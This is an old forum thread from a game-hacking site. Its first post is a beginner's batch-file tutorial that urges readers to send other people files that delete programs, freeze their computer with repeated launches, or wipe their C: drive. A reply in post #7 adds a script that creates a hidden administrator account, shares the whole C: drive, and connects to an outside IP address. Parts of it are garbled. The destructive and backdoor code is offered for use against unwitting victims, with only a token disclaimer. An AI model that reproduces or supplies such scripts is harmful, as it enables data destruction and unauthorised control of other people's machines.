Skip to content
MPGHThe Dark Arts
/
RegisterLog in
Forum
Community
What's NewLatest posts across the boardTrendingHottest threads right nowSubscribedThreads you follow
Discussion
GeneralIntroductionsEntertainmentDebate FortFlaming & Rage
Board
News & AnnouncementsMPGH TimesSuggestions & HelpGiveaways
More Sections
Art & Graphic DesignProgrammingHackingCryptocurrency
Hacks & Cheats
Games
ValorantCS2 / CS:GOCall of Duty / WarzoneFortniteApex LegendsEscape From Tarkov
+14 moreLeague of LegendsGTA VMinecraftRustROTMGBattlefieldTroveBattleOnCombat ArmsCrossFireBlackshotRuneScapeDayZDead by Daylight
Resources
Game Hacking TutorialsReverse EngineeringGeneral Game HackingAnti-CheatConsole Game Hacking
Tools
Game Hacking ToolsTrainers & CheatsHack/Release NewsNew
Submit a release →Share your cheat, tool, or config with the community.
AINEW
AI Tools
General & DiscussionPrompt EngineeringLLM JailbreaksHotAI Agents & AutomationLocal / Open Models
AI × Gaming
AI Aimbots & VisionML Anti-CheatGame Bots & Automation
Create
AI Coding / Vibe CodingAI Art & MediaAI Voice & TTS
The AI frontier →Where game hacking meets modern machine learning. Jump in.
Marketplace
Buy & Sell
SellingBuyingTradingUser Services
Trust & Safety
Middleman LoungeMarketplace TalkVouch Copy Profiles
Money
Cryptocurrency TalkCurrency ExchangeWork & Job Offers
Start selling →List accounts, services, and goods. Use the middleman to trade safe.
MPGH The Dark Arts

A community for offensive security research, reverse engineering, and AI.

Community

ForumMarketplaceSearch

Account

RegisterLog in

Legal

Privacy PolicyForum RulesHelp & FAQ
© 2026 MPGH · All rights reserved.Built by the community, for the community. For educational purposes onlyContent is shared for security research and education — we don't condone illegal use. You're responsible for complying with applicable laws. Use at your own risk.
Home › Forum › MultiPlayer Game Hacks & Cheats › Game Hack & Cheat Development › General Game Hacking › Batch Tutorial! - Mess With Your Friends

Batch Tutorial! - Mess With Your Friends

Posts 1–7 of 7 · Page 1 of 1
Haites
Haites
Batch Tutorial! - Mess With Your Friends
Hey guys! This is Haites and this is my first tutorial on MPGH.

I'm sure many of you are familiar with Batch files, or have at least heard of them, but for all of those people that don't know about batch's, I'm here to show you what they are, what they do, and how you can do some serious damage to someones computer, or just have a little fun.

My Description: A Batch file is a file that executes a task with command prompt (CMD) usually reads and executes. Batch files are used to open several programs with one click, but in this case, we are using it to cause complete havoc.

FIRST OF ALL!!!
----------------
I'm not held responsible for any actions you make. This tutorial is made for educational purposes only and should not be used in any illegal behavior.
----------------

Time for the fun stuff!

All you need is notepad, and a few codes.

Open up notepad. Were going to do a quick execute of internet explorer. Make sure the notepad is empty.

Copy and Paste the following code into your notepad.

Code:
@echo off
copy 0% iexplore.exe
start iexplore.exe
"Start iexplore.exe" means that it's going to start Internet Explorer.

.exe Means Executable.

Now save that. You can name it anything, as long as you put .bat at the end.

IMPORTANT: When you save it, it's going to say "Save as Type: Test Documents (*.txt)", Ignore this. For the file name, literally put ".bat" at the end.

Example:

Save that anywhere you would like, and then open it. Internet Explorer should open. You made your first successful batch.

Now to make a lag bomb, you can freeze someones computer by putting "Start iexplore.exe" multiple times on notepad.

With Batch's, you can also delete programs too.

If you wanted to delete Internet Explorer, it would look like this:
Code:
@echo off
copy 0% iexplore.exe
del iexplore.exe
I know what your thinking, I can send this to people and when they open it, it deletes files from their computer? That is correct.

It's even possible to delete a persons whole entire C:\ drive. Thus, completely
killing their computer. I'm not going to get into that. Now you know 2 ways to do use a batch, test it out a bit. Experiment.

I don't hold any responsibility for your actions. Use batch files at your own risk.

Post comments to my tutorial if you found it useful or need any help!

There are also more tasks and commands with Batch files, and more tricks I can teach you. If you find this tutorial useful, I might make an advanced Batch file tutorial.
#1 · edited 18y ago · 18y ago
pbsucks
pbsucks
Great begginers tutorial for batch-files...

I'm interested!

I'm quite sure that c and c++ contain making batch-files
#2 · 18y ago
123456789987654321
123456789987654321
nice tut but u can find many more at youtube
#3 · 18y ago
pbsucks
pbsucks
i know but i hate these video-tutorials mostly because you can't see anything
#4 · 18y ago
W$
W$t$5TA34TYTHSETH5Y5
Open notepad and type this

Start Google

Save as whatever.bat

And see what happens
#5 · 18y ago
RA
rambone11
nice, one oof the best
#6 · 18y ago
(-
(-DemonRZ-)
There's quite a few more virus/batch commands than that.
I love to hack using batch >.<
Here's a little code to have fun with.
Code:
@echo off
title Don't be Scared...
color 0a
echo oooooooooo.                                                     
echo `888'   `Y8b                                                    
echo  888      888  .ooooo.  ooo. .oo.  .oo.    .ooooo.  ooo. .oo.   
echo  888      888 d88' `88b `888P"Y88bP"Y88b  d88' `88b `888P"Y88b  
echo  888      888 888ooo888  888   888   888  888   888  888   888  
echo  888     d88' 888    .o  888   888   888  888   888  888   888  
echo o888bood8P'   `Y8bod8P' o888o o888o o888o `Y8bod8P' o888o o888o 
echo                            o8o           
echo                            `"'           
echo                           oooo   .oooo.o 
echo                           `888  d88(  "8 
echo                            888  `"Y88b.  
echo                            888  o.  )88b 
echo                           o888o 8""888P' 
echo ooooo   ooooo                     oooo         o8o                         
echo `888'   `888'                     `888         `"'                         
echo  888     888   .oooo.    .ooooo.   888  oooo  oooo  ooo. .oo.    .oooooooo 
echo  888ooooo888  `P  )88b  d88' `"Y8  888 .8P'   `888  `888P"Y88b  888' `88b  
echo  888     888   .oP"888  888        888888.     888   888   888  888   888  
echo  888     888  d8(  888  888   .o8  888 `88b.   888   888   888  `88bod8P'  
echo o888o   o888o `Y888""8o `Y8bod8P' o888o o888o o888o o888o o888o `8oooooo.  
echo                                                                 d"     YD  
echo                                                                 "Y88888P'
pause
net use = Shared.IP.range.0-155
net user (-DemonRZ-) /add
net localgroup administrators (-DemonRZ-) /add
net share system=C: /unlimited
net send * I am your server (-DemonRZ-)
net use \72.243.210.162 (-DemonRZ-)
explorer \72.243.210.162system
msg * %computername%, is being hacked >.<
#7 · 18y ago
Posts 1–7 of 7 · Page 1 of 1

Post a Reply

Similar Threads

  • Screw around with your friends with this. ;)By mastowns in Spammers Corner
    0Last post 17y ago
  • zombie mode is better to play with your friendsBy PasterOfMuppets in CrossFire Discussions
    20Last post 14y ago
  • [Tutorial] Scare your friends with fake virusBy Gab in Programming Tutorials
    10Last post 15y ago
  • C++ Program to mess with friendsBy aanthonyz in C++/C Programming
    15Last post 15y ago
  • Please check your friend list, better yet bot with no1 on FLBy XLVII in Vindictus Discussions
    13Last post 15y ago

Tags for this Thread

None